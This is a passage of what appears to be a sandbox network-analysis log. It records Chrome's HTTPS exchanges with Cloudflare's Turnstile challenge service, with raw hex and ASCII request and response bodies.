                                                      Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20ghE7hw6ccgTRFbwDnjgyEvHM8x2Np6yfwNB6btvFGhwgAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                      2025-01-14 15:11:26 UTC1INData Raw: 4a
                                                      Data Ascii: J


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.749741104.18.95.414433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:28 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/901e8eeb3e1dc337/1736867485190/-jhu53-RLAzm1Ay HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ipdm4/0x4AAAAAAA3RtpCTVu7-vpVs/auto/fbE/normal/auto/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:28 UTC200INHTTP/1.1 200 OK
                                                      Date: Tue, 14 Jan 2025 15:11:28 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 61
                                                      Connection: close
                                                      Server: cloudflare
                                                      CF-RAY: 901e8f0d4bd87d1a-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2025-01-14 15:11:28 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 2f 08 02 00 00 00 0d 4e 5f 76 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                      Data Ascii: PNGIHDR /N_vIDAT$IENDB`


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.749742104.18.95.414433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:29 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1388961222:1736863973:GZGEH0pIw0BU0Gk3FFCEuy8by8CZFsaUV52txd7bA3s/901e8eeb3e1dc337/UKdFAV8735A.fnyP9jwvLCzYUUCicqviSOTpl0y47QA-1736867483-1.1.1.1-s2.BR4GeipckaJLuZ.uJDVn2lHya14qp0yokk3FDojg3VhgSENeOY1eLHm9OzyAN HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 32071
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Content-type: application/x-www-form-urlencoded
                                                      CF-Chl-RetryAttempt: 0
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      CF-Challenge: UKdFAV8735A.fnyP9jwvLCzYUUCicqviSOTpl0y47QA-1736867483-1.1.1.1-s2.BR4GeipckaJLuZ.uJDVn2lHya14qp0yokk3FDojg3VhgSENeOY1eLHm9OzyAN
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://challenges.cloudflare.com
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ipdm4/0x4AAAAAAA3RtpCTVu7-vpVs/auto/fbE/normal/auto/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:29 UTC16384OUTData Raw: 76 5f 39 30 31 65 38 65 65 62 33 65 31 64 63 33 33 37 3d 59 70 35 77 6e 4f 49 50 45 69 70 7a 70 7a 6b 70 49 57 49 69 66 25 32 62 4c 50 24 4a 7a 36 7a 52 77 49 35 24 71 7a 61 77 36 78 5a 49 4d 69 7a 77 77 64 6f 70 24 48 69 35 7a 59 4f 7a 4f 6d 5a 24 30 7a 42 77 4f 4d 7a 64 49 77 4f 6c 7a 66 52 5a 63 69 7a 75 41 7a 6c 7a 55 52 41 37 4a 35 7a 71 70 4f 7a 37 58 41 57 55 35 5a 7a 6f 41 49 34 24 77 57 4d 7a 58 77 24 65 68 35 78 4f 37 7a 7a 37 7a 6f 45 7a 79 66 51 34 77 77 7a 24 75 7a 24 72 35 7a 49 43 4b 75 41 49 46 71 2b 7a 64 2d 2d 69 73 75 74 57 67 7a 4c 2d 42 42 77 30 45 34 64 6e 4f 50 2d 69 2b 61 62 65 2d 71 71 35 67 6d 7a 4f 7a 39 75 66 70 7a 57 69 2b 61 2b 55 48 42 66 6b 5a 50 2d 78 36 76 69 64 30 77 57 6b 78 78 53 57 4a 4a 53 4e 71 53 35 64 4b 5a 59 64
                                                      Data Ascii: v_901e8eeb3e1dc337=Yp5wnOIPEipzpzkpIWIif%2bLP$Jz6zRwI5$qzaw6xZIMizwwdop$Hi5zYOzOmZ$0zBwOMzdIwOlzfRZcizuAzlzURA7J5zqpOz7XAWU5ZzoAI4$wWMzXw$eh5xO7zz7zoEzyfQ4wwz$uz$r5zICKuAIFq+zd--isutWgzL-BBw0E4dnOP-i+abe-qq5gmzOz9ufpzWi+a+UHBfkZP-x6vid0wWkxxSWJJSNqS5dKZYd
                                                      2025-01-14 15:11:29 UTC15687OUTData Raw: 57 35 74 41 39 53 35 45 7a 55 74 4a 6b 58 6b 24 6c 55 38 58 50 30 50 2b 6a 76 61 76 61 2b 7a 24 41 75 77 49 57 7a 75 7a 7a 61 7a 4d 7a 6d 7a 7a 5a 77 48 6b 66 77 4f 45 49 4c 73 50 41 7a 50 7a 4a 77 73 7a 75 35 49 65 7a 6c 36 4c 70 49 39 7a 69 2b 7a 69 55 37 7a 55 2b 24 76 7a 2b 7a 5a 34 4f 6b 7a 63 7a 6a 2b 4c 35 7a 31 7a 69 41 4f 4d 7a 6d 7a 6f 7a 4c 4d 7a 4f 30 37 70 57 4d 49 41 7a 31 77 49 2b 77 41 7a 35 41 71 6c 55 78 7a 6f 62 75 36 39 66 7a 69 7a 57 6b 7a 41 7a 75 4f 24 30 77 61 70 42 2b 4f 61 49 53 44 35 2b 75 5a 4f 39 77 63 77 6f 45 52 59 7a 75 4f 7a 69 49 6c 7a 39 77 69 70 7a 6e 7a 66 2b 59 5a 4f 6e 7a 5a 77 75 69 77 39 7a 64 41 4f 58 24 30 7a 35 2b 57 6b 7a 67 69 69 7a 71 35 49 62 7a 47 7a 57 7a 4f 57 41 42 41 4c 77 7a 58 7a 59 7a 7a 41 7a 50 7a
                                                      Data Ascii: W5tA9S5EzUtJkXk$lU8XP0P+jvava+z$AuwIWzuzzazMzmzzZwHkfwOEILsPAzPzJwszu5Iezl6LpI9zi+ziU7zU+$vz+zZ4Okzczj+L5z1ziAOMzmzozLMzO07pWMIAz1wI+wAz5AqlUxzobu69fzizWkzAzuO$0wapB+OaISD5+uZO9wcwoERYzuOziIlz9wipznzf+YZOnzZwuiw9zdAOX$0z5+Wkzgiizq5IbzGzWzOWABALwzXzYzzAzPz
                                                      2025-01-14 15:11:29 UTC322INHTTP/1.1 200 OK
                                                      Date: Tue, 14 Jan 2025 15:11:29 GMT
                                                      Content-Type: text/plain; charset=UTF-8
                                                      Content-Length: 26316
                                                      Connection: close
                                                      cf-chl-gen: SdRu7yWUZuJkxzSbUmNhEL0hDawxQY1zA2Yov8/QfK+t/Wf2SLR4225MI+VkvcBt$Q8/0CSLcmRSwIV7LbqpkYQ==
                                                      Server: cloudflare
                                                      CF-RAY: 901e8f11fe6d43d5-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2025-01-14 15:11:29 UTC1047INData Raw: 59 35 65 58 61 5a 56 6e 65 71 42 7a 62 49 4b 65 64 58 39 59 65 59 47 61 6e 6d 75 6f 6c 6f 68 76 72 4a 71 45 72 37 47 64 62 36 2b 76 73 57 79 4d 6c 61 32 2f 6b 4c 65 35 73 73 53 39 6d 4b 54 45 75 4a 57 71 69 4d 66 46 68 34 76 48 6a 6f 53 4e 7a 61 65 2b 31 4d 65 51 75 74 6a 57 6e 62 57 7a 34 5a 72 4b 34 4e 50 58 78 75 50 6b 75 36 4f 6b 34 71 71 67 76 4d 6e 68 71 4c 76 76 74 4c 4f 79 32 66 47 73 78 39 58 74 41 4e 54 33 31 74 79 39 42 4e 50 67 42 66 62 41 36 73 59 46 39 76 6f 45 45 41 76 6f 45 52 44 53 7a 77 30 51 45 73 7a 6c 39 51 37 55 36 68 33 30 46 79 45 46 48 50 6b 6d 32 67 45 67 42 52 37 6d 4b 76 67 77 43 69 33 7a 44 67 49 4c 38 7a 45 37 37 41 6f 70 46 52 34 38 2f 69 38 30 41 67 4d 30 4d 45 67 49 2b 30 42 4a 4f 79 59 75 49 6a 34 75 4c 42 38 6f 4e 45 6b
                                                      Data Ascii: Y5eXaZVneqBzbIKedX9YeYGanmuolohvrJqEr7Gdb6+vsWyMla2/kLe5ssS9mKTEuJWqiMfFh4vHjoSNzae+1MeQutjWnbWz4ZrK4NPXxuPku6Ok4qqgvMnhqLvvtLOy2fGsx9XtANT31ty9BNPgBfbA6sYF9voEEAvoERDSzw0QEszl9Q7U6h30FyEFHPkm2gEgBR7mKvgwCi3zDgIL8zE77AopFR48/i80AgM0MEgI+0BJOyYuIj4uLB8oNEk
                                                      2025-01-14 15:11:29 UTC1369INData Raw: 72 69 59 4e 38 65 4b 36 7a 71 4c 4f 6f 67 4c 65 53 71 37 43 4d 75 6e 79 48 63 62 43 32 76 59 2b 66 66 6f 61 39 6c 6f 4b 4b 77 59 57 47 6a 73 58 45 69 70 4c 49 76 4d 6e 51 6a 39 6d 53 6d 74 43 72 79 4d 6e 58 7a 4a 6e 65 72 61 43 30 33 64 54 45 78 2b 54 4a 78 38 79 35 70 65 6e 44 37 63 62 47 39 74 48 45 34 2f 6e 58 35 63 6e 38 37 66 76 32 32 4f 79 37 2b 63 54 59 43 51 66 59 78 39 33 34 78 4f 6a 6d 2b 63 72 39 44 50 77 58 39 65 34 43 30 67 55 48 31 4e 59 57 33 66 37 65 44 4e 72 2b 47 75 59 42 45 53 6b 4d 41 52 63 43 4a 69 73 4e 41 68 51 6a 41 76 55 72 4f 41 30 45 37 50 6f 65 45 54 59 51 50 43 6f 35 4f 68 63 34 49 42 5a 46 4e 44 73 66 51 30 30 62 48 45 4e 47 52 52 4e 55 43 44 55 51 4d 30 39 4e 44 6b 56 61 56 7a 49 5a 4c 45 49 6a 55 6a 45 35 57 6c 45 6e 56 45
                                                      Data Ascii: riYN8eK6zqLOogLeSq7CMunyHcbC2vY+ffoa9loKKwYWGjsXEipLIvMnQj9mSmtCryMnXzJneraC03dTEx+TJx8y5penD7cbG9tHE4/nX5cn87fv22Oy7+cTYCQfYx934xOjm+cr9DPwX9e4C0gUH1NYW3f7eDNr+GuYBESkMARcCJisNAhQjAvUrOA0E7PoeETYQPCo5Ohc4IBZFNDsfQ00bHENGRRNUCDUQM09NDkVaVzIZLEIjUjE5WlEnVE
                                                      2025-01-14 15:11:29 UTC1369INData Raw: 68 58 35 73 72 48 2b 6d 6d 48 57 4f 6c 6f 71 2b 6b 33 4b 64 76 72 56 37 6e 59 2b 39 71 5a 79 34 6d 34 58 49 6c 37 37 45 69 39 4f 52 71 37 36 51 6b 73 61 54 6b 61 65 79 70 35 33 4d 75 4e 44 69 35 4b 32 33 78 4d 58 46 77 36 54 58 32 36 72 58 78 4b 6e 4a 71 4d 66 74 78 2f 44 6c 31 75 76 50 36 75 54 34 78 2b 37 31 30 41 44 41 38 65 48 47 34 4e 54 64 42 67 54 44 32 39 7a 35 2f 50 34 4a 30 51 62 4e 34 75 38 5a 43 68 54 7a 2f 50 34 5a 33 52 37 34 48 65 4d 6a 4a 79 4c 2b 42 51 50 31 2f 69 55 70 39 78 38 6d 4b 2b 37 78 49 66 4d 73 39 65 6f 34 44 2f 6b 59 39 51 73 59 51 66 4d 38 48 43 55 6e 52 41 6a 36 4f 30 45 4b 4f 54 77 50 4b 52 30 6d 54 54 77 74 4d 54 55 55 53 6a 6b 70 53 7a 35 53 56 31 68 52 58 54 74 58 47 7a 56 6e 55 79 67 6e 5a 32 41 6b 59 7a 74 75 4b 46 6f
                                                      Data Ascii: hX5srH+mmHWOloq+k3KdvrV7nY+9qZy4m4XIl77Ei9ORq76QksaTkaeyp53MuNDi5K23xMXFw6TX26rXxKnJqMftx/Dl1uvP6uT4x+710ADA8eHG4NTdBgTD29z5/P4J0QbN4u8ZChTz/P4Z3R74HeMjJyL+BQP1/iUp9x8mK+7xIfMs9eo4D/kY9QsYQfM8HCUnRAj6O0EKOTwPKR0mTTwtMTUUSjkpSz5SV1hRXTtXGzVnUygnZ2AkYztuKFo
                                                      2025-01-14 15:11:29 UTC1369INData Raw: 72 57 6b 73 33 57 4c 75 4a 32 7a 65 73 43 4f 75 58 36 66 68 62 32 43 6f 38 54 42 68 71 65 34 78 59 71 72 70 73 6d 4f 74 4d 66 4e 72 62 71 63 32 70 37 4f 76 4e 76 66 31 39 4c 45 75 4f 43 69 36 4c 69 2b 76 71 71 6f 36 4d 50 50 35 75 33 73 70 37 37 51 36 66 58 75 39 72 6e 74 2b 2f 6d 39 41 73 44 36 2f 66 44 57 42 76 4c 38 34 51 30 4b 79 4d 7a 77 33 38 73 51 44 51 67 48 79 42 49 56 46 4e 6a 71 43 50 77 62 47 76 6f 53 49 66 54 79 35 65 62 30 35 41 49 4d 49 41 37 38 48 76 63 72 2f 69 59 48 43 75 34 44 37 2f 6a 77 38 54 59 65 46 52 6e 34 4e 42 38 72 48 30 4d 56 42 42 6f 31 41 52 6f 6a 4e 67 63 2b 4f 54 6f 4c 51 54 30 2b 44 30 68 42 51 68 4e 4c 52 55 59 58 53 6c 68 4a 59 30 49 37 54 68 39 52 55 79 45 6a 59 69 70 4c 4b 6c 42 46 57 69 6c 71 62 31 42 32 62 6e 4e 56
                                                      Data Ascii: rWks3WLuJ2zesCOuX6fhb2Co8TBhqe4xYqrpsmOtMfNrbqc2p7OvNvf19LEuOCi6Li+vqqo6MPP5u3sp77Q6fXu9rnt+/m9AsD6/fDWBvL84Q0KyMzw38sQDQgHyBIVFNjqCPwbGvoSIfTy5eb05AIMIA78Hvcr/iYHCu4D7/jw8TYeFRn4NB8rH0MVBBo1ARojNgc+OToLQT0+D0hBQhNLRUYXSlhJY0I7Th9RUyEjYipLKlBFWilqb1B2bnNV
                                                      2025-01-14 15:11:29 UTC1369INData Raw: 65 2b 73 37 75 38 76 72 75 64 73 4b 4f 6e 70 4b 65 58 75 61 79 38 77 64 4b 77 71 63 2b 30 31 74 48 4c 30 72 44 63 79 35 57 79 75 73 2f 66 75 65 54 6a 6f 72 79 68 33 2b 4b 38 31 64 2f 67 34 75 4c 4e 38 75 79 78 73 75 71 75 2b 64 66 59 74 4f 37 32 74 39 54 4e 76 4e 33 30 31 4f 4c 6a 31 39 72 42 31 2f 50 58 34 4f 6f 4b 2f 68 50 67 34 2f 33 76 30 74 50 78 34 74 72 62 43 63 38 66 2f 66 55 66 31 43 4d 57 39 79 67 43 42 41 4c 68 2f 43 34 64 44 67 73 68 2b 68 51 45 37 42 4d 48 45 67 51 73 50 42 55 58 46 77 73 56 39 77 73 67 48 66 77 53 41 43 5a 4a 52 53 6b 67 47 6b 45 67 4a 45 51 6d 53 44 41 4d 4c 79 45 31 53 56 45 74 4c 31 35 49 58 44 5a 69 54 42 77 2f 4d 6d 45 2b 4f 79 45 33 51 55 41 6b 52 31 42 4f 54 57 52 75 54 6e 55 31 4d 56 56 57 51 6a 64 58 62 56 39 58 58
                                                      Data Ascii: e+s7u8vrudsKOnpKeXuay8wdKwqc+01tHL0rDcy5Wyus/fueTjoryh3+K81d/g4uLN8uyxsuqu+dfYtO72t9TNvN301OLj19rB1/PX4OoK/hPg4/3v0tPx4trbCc8f/fUf1CMW9ygCBALh/C4dDgsh+hQE7BMHEgQsPBUXFwsV9wsgHfwSACZJRSkgGkEgJEQmSDAMLyE1SVEtL15IXDZiTBw/MmE+OyE3QUAkR1BOTWRuTnU1MVVWQjdXbV9XX
                                                      2025-01-14 15:11:29 UTC1369INData Raw: 48 68 35 65 41 75 62 57 4b 6e 59 62 4a 30 4d 72 43 74 4e 47 75 79 4a 54 43 73 63 36 58 32 62 54 51 72 39 6d 37 31 37 54 67 6f 39 6a 66 78 38 61 69 7a 4c 7a 47 37 62 44 41 77 76 4f 7a 33 62 62 6c 34 2b 62 5a 2b 37 76 79 79 2f 33 70 73 38 73 42 2b 76 4c 67 42 64 59 43 31 2f 76 49 31 2b 55 44 43 38 50 78 42 4d 2f 53 36 67 51 51 35 2f 6f 4d 31 68 62 30 45 77 4c 38 2b 79 54 34 38 50 6b 56 43 66 66 67 4b 65 73 62 42 79 37 77 41 41 4c 71 4c 6a 55 76 4a 78 6b 32 45 79 33 34 4a 78 59 7a 2b 7a 34 5a 4e 52 51 2b 49 44 77 5a 52 51 67 39 52 43 77 72 42 7a 45 67 43 56 45 55 52 79 70 5a 47 44 55 6b 53 55 64 62 4d 6c 39 4d 4c 54 68 54 4a 54 67 6d 55 46 39 49 50 6c 34 39 49 45 31 78 4c 56 35 47 5a 57 74 31 4e 47 70 61 61 6b 35 6f 63 7a 74 63 63 31 5a 52 55 34 52 45 55 30
                                                      Data Ascii: Hh5eAubWKnYbJ0MrCtNGuyJTCsc6X2bTQr9m717Tgo9jfx8aizLzG7bDAwvOz3bbl4+bZ+7vyy/3ps8sB+vLgBdYC1/vI1+UDC8PxBM/S6gQQ5/oM1hb0EwL8+yT48PkVCffgKesbBy7wAALqLjUvJxk2Ey34JxYz+z4ZNRQ+IDwZRQg9RCwrBzEgCVEURypZGDUkSUdbMl9MLThTJTgmUF9IPl49IE1xLV5GZWt1NGpaak5ocztcc1ZRU4REU0
                                                      2025-01-14 15:11:29 UTC1369INData Raw: 6c 38 2b 50 7a 70 72 54 71 49 2b 6d 31 70 65 6b 70 74 75 77 72 4c 44 65 32 74 61 7a 35 4d 37 57 72 75 58 53 31 72 6e 71 71 39 36 2f 37 73 54 69 78 2f 4f 7a 35 73 54 32 38 75 37 4e 2b 72 76 32 79 67 44 71 75 39 55 44 37 75 44 56 42 74 7a 6b 32 51 7a 32 42 39 77 52 2b 67 2f 67 46 41 38 4c 34 78 59 44 39 4f 49 63 32 77 2f 7a 49 4e 2f 77 39 53 51 50 48 2f 63 6f 35 77 6e 36 4c 41 48 6e 41 54 44 76 44 66 6f 7a 4c 79 38 49 4e 69 4d 76 44 44 30 6e 4e 78 45 2f 4b 78 30 52 51 77 51 6c 46 55 64 44 4f 79 42 4d 52 79 6b 66 54 78 42 48 49 6c 4d 70 4a 53 64 58 55 78 51 74 57 78 78 54 4d 47 42 62 50 54 5a 69 54 31 73 30 61 56 4e 4a 50 47 70 42 54 54 74 76 61 32 4d 37 64 46 39 42 54 48 67 34 59 30 64 37 5a 33 74 52 67 48 74 68 55 49 56 76 5a 56 6d 49 63 34 64 65 69 34 64
                                                      Data Ascii: l8+PzprTqI+m1pekptuwrLDe2taz5M7WruXS1rnqq96/7sTix/Oz5sT28u7N+rv2ygDqu9UD7uDVBtzk2Qz2B9wR+g/gFA8L4xYD9OIc2w/zIN/w9SQPH/co5wn6LAHnATDvDfozLy8INiMvDD0nNxE/Kx0RQwQlFUdDOyBMRykfTxBHIlMpJSdXUxQtWxxTMGBbPTZiT1s0aVNJPGpBTTtva2M7dF9BTHg4Y0d7Z3tRgHthUIVvZVmIc4dei4d
                                                      2025-01-14 15:11:29 UTC1369INData Raw: 35 57 4d 77 64 50 45 31 4a 4b 77 6c 5a 79 2f 31 63 7a 4d 6d 72 69 64 6e 73 66 64 31 4e 53 69 77 4b 58 72 37 4c 2f 61 78 39 79 79 39 63 69 75 31 71 2f 50 2b 37 7a 47 36 2b 2f 37 7a 67 41 46 37 76 62 59 76 74 57 37 33 4d 4c 71 77 2b 4d 51 7a 77 2f 71 46 66 49 4b 31 51 6a 59 35 68 67 64 2b 2b 7a 39 43 78 54 68 49 64 76 65 42 78 51 53 2f 52 55 71 34 67 48 6c 4c 43 33 2b 4d 77 67 64 43 44 55 79 4f 52 66 79 2b 53 59 33 39 54 38 39 45 54 38 63 4c 67 54 39 51 2f 34 64 41 6b 78 4a 48 42 6b 6b 4f 69 52 52 55 6c 55 30 4a 42 5a 44 55 78 49 55 57 53 31 62 4f 45 6c 62 47 6c 6f 62 4e 47 55 6b 53 47 4e 64 56 57 6b 39 61 30 68 62 61 79 6f 77 56 47 39 70 59 53 39 4e 4d 6a 68 63 64 32 31 70 66 56 46 2f 58 47 35 76 50 6b 52 6f 67 33 6c 31 51 32 46 47 54 48 43 4c 6a 58 32 52
                                                      Data Ascii: 5WMwdPE1JKwlZy/1czMmridnsfd1NSiwKXr7L/ax9yy9ciu1q/P+7zG6+/7zgAF7vbYvtW73MLqw+MQzw/qFfIK1QjY5hgd++z9CxThIdveBxQS/RUq4gHlLC3+MwgdCDUyORfy+SY39T89ET8cLgT9Q/4dAkxJHBkkOiRRUlU0JBZDUxIUWS1bOElbGlobNGUkSGNdVWk9a0hbayowVG9pYS9NMjhcd21pfVF/XG5vPkRog3l1Q2FGTHCLjX2R


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.749743104.18.94.414433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:29 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/901e8eeb3e1dc337/1736867485190/-jhu53-RLAzm1Ay HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:29 UTC200INHTTP/1.1 200 OK
                                                      Date: Tue, 14 Jan 2025 15:11:29 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 61
                                                      Connection: close
                                                      Server: cloudflare
                                                      CF-RAY: 901e8f11fb5143b2-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2025-01-14 15:11:29 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 2f 08 02 00 00 00 0d 4e 5f 76 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                      Data Ascii: PNGIHDR /N_vIDAT$IENDB`


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.749744104.18.94.414433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:30 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1388961222:1736863973:GZGEH0pIw0BU0Gk3FFCEuy8by8CZFsaUV52txd7bA3s/901e8eeb3e1dc337/UKdFAV8735A.fnyP9jwvLCzYUUCicqviSOTpl0y47QA-1736867483-1.1.1.1-s2.BR4GeipckaJLuZ.uJDVn2lHya14qp0yokk3FDojg3VhgSENeOY1eLHm9OzyAN HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:30 UTC442INHTTP/1.1 400 Bad Request
                                                      Date: Tue, 14 Jan 2025 15:11:30 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 14
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      cf-chl-out: 65AsJLiWFKKXNSLYxvB0+sgEDyBLwL7I746HPvze0a3KudoZ19D8SB/tpD2GHSOfUDCmVZGTXcbXMVptUpxGsg==$yq8XQAd9JSpB4Z2eeTUEAw==
                                                      Server: cloudflare
                                                      CF-RAY: 901e8f176bc7428f-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2025-01-14 15:11:30 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                      Data Ascii: {"err":100230}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.749745104.18.95.414433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:39 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1388961222:1736863973:GZGEH0pIw0BU0Gk3FFCEuy8by8CZFsaUV52txd7bA3s/901e8eeb3e1dc337/UKdFAV8735A.fnyP9jwvLCzYUUCicqviSOTpl0y47QA-1736867483-1.1.1.1-s2.BR4GeipckaJLuZ.uJDVn2lHya14qp0yokk3FDojg3VhgSENeOY1eLHm9OzyAN HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 34501
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Content-type: application/x-www-form-urlencoded
                                                      CF-Chl-RetryAttempt: 0
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      CF-Challenge: UKdFAV8735A.fnyP9jwvLCzYUUCicqviSOTpl0y47QA-1736867483-1.1.1.1-s2.BR4GeipckaJLuZ.uJDVn2lHya14qp0yokk3FDojg3VhgSENeOY1eLHm9OzyAN
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://challenges.cloudflare.com
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ipdm4/0x4AAAAAAA3RtpCTVu7-vpVs/auto/fbE/normal/auto/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:39 UTC16384OUTData Raw: 76 5f 39 30 31 65 38 65 65 62 33 65 31 64 63 33 33 37 3d 59 70 35 77 6e 4f 49 50 45 69 70 7a 70 7a 6b 70 49 57 49 69 66 25 32 62 4c 50 24 4a 7a 36 7a 52 77 49 35 24 71 7a 61 77 36 78 5a 49 4d 69 7a 77 77 64 6f 70 24 48 69 35 7a 59 4f 7a 4f 6d 5a 24 30 7a 42 77 4f 4d 7a 64 49 77 4f 6c 7a 66 52 5a 63 69 7a 75 41 7a 6c 7a 55 52 41 37 4a 35 7a 71 70 4f 7a 37 58 41 57 55 35 5a 7a 6f 41 49 34 24 77 57 4d 7a 58 77 24 65 68 35 78 4f 37 7a 7a 37 7a 6f 45 7a 79 66 51 34 77 77 7a 24 75 7a 24 72 35 7a 49 43 4b 75 41 49 46 71 2b 7a 64 2d 2d 69 73 75 74 57 67 7a 4c 2d 42 42 77 30 45 34 64 6e 4f 50 2d 69 2b 61 62 65 2d 71 71 35 67 6d 7a 4f 7a 39 75 66 70 7a 57 69 2b 61 2b 55 48 42 66 6b 5a 50 2d 78 36 76 69 64 30 77 57 6b 78 78 53 57 4a 4a 53 4e 71 53 35 64 4b 5a 59 64
                                                      Data Ascii: v_901e8eeb3e1dc337=Yp5wnOIPEipzpzkpIWIif%2bLP$Jz6zRwI5$qzaw6xZIMizwwdop$Hi5zYOzOmZ$0zBwOMzdIwOlzfRZcizuAzlzURA7J5zqpOz7XAWU5ZzoAI4$wWMzXw$eh5xO7zz7zoEzyfQ4wwz$uz$r5zICKuAIFq+zd--isutWgzL-BBw0E4dnOP-i+abe-qq5gmzOz9ufpzWi+a+UHBfkZP-x6vid0wWkxxSWJJSNqS5dKZYd
